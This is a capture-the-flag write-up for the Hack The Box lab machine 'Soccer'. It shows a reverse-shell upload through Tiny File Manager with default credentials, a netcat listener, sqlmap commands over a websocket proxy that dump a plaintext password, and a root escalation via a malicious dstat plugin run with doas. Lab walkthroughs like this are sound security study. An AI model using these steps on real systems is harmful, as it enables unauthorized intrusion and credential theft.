Soccer
- Date completed: 2023-03-11
- Difficulty: Easy
- OS: Linux
User flag
Initial nmap:
$ nmap -sC -sV 10.10.11.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 12:30 CST
Nmap scan report for soccer.htb (10.10.11.194)
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Soccer - Index
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Sat, 11 Mar 2023 18:35:16 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Sat, 11 Mar 2023 18:35:17 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>
This box is running Tiny File Manager 2.4.3 on http://soccer.htb/tiny, and this software is vulnerable to an authenticated file upload vulnerability.
The default credentials (admin/admin@123) worked to log in.
I was able to upload a php reverse shell using the tinyfilemanager portal in the "uploads" folder.
Start a netcat listener with:
nc -lvnp <port>
Then access the page at https://soccer.htb/tiny/uploads/revshell.php
Looking in /etc/nginx/sites-available shows that there's another site we can access. Add soc-player.soccer.htb to your /etc/hosts.
Go to the website and create an account. After logging in on the next page, try making a simple SQL injection, which works.
After inspecting the source, this is sent to the service running on port 9091 using websockets.
We can use the proxy from https://github.com/BKreisel/sqlmap-websocket-proxy to use sqlmap with websockets and see what we can find.
sqlmap-websocket-proxy -u ws://soc-player.soccer.htb:9091 -p '{"id": "%param%"}' --json
sqlmap -u http://localhost:8080/?id=1 -p "id" --dbs
sqlmap -u http://localhost:8080/?id=1 -p "id" -D soccer_db --tables
sqlmap -u http://localhost:8080/?id=1 -p "id" -D soccer_db -T accounts --dump
This gives us a username and password in plaintext:
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+
We can then use these credentials to log in with ssh and get the user flag!
Root flag
First check for sudo permissions. Unfortunately, this user has none.
Then check for suid files:
player@soccer:~$ find /* -user root -perm -4000 -print 2>/dev/null | grep -v snap
/usr/local/bin/doas
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
There's one thing that stands out here, and that's the locally installed doas. Check the configuration:
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
If we look through the man page for dstat, we see that it can load plugins. The default plugins are stored are /usr/share/dstat, so take a look there to get an idea of what they do. They're just python scripts, so it's pretty simple to abuse them for superuser access.
Create a new plugin in /usr/local/share/dstat called dstat_flag.py and add the following:
import os
os.system("cat /root/root.txt")
Then run it with:
player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --flag
And that's the root flag!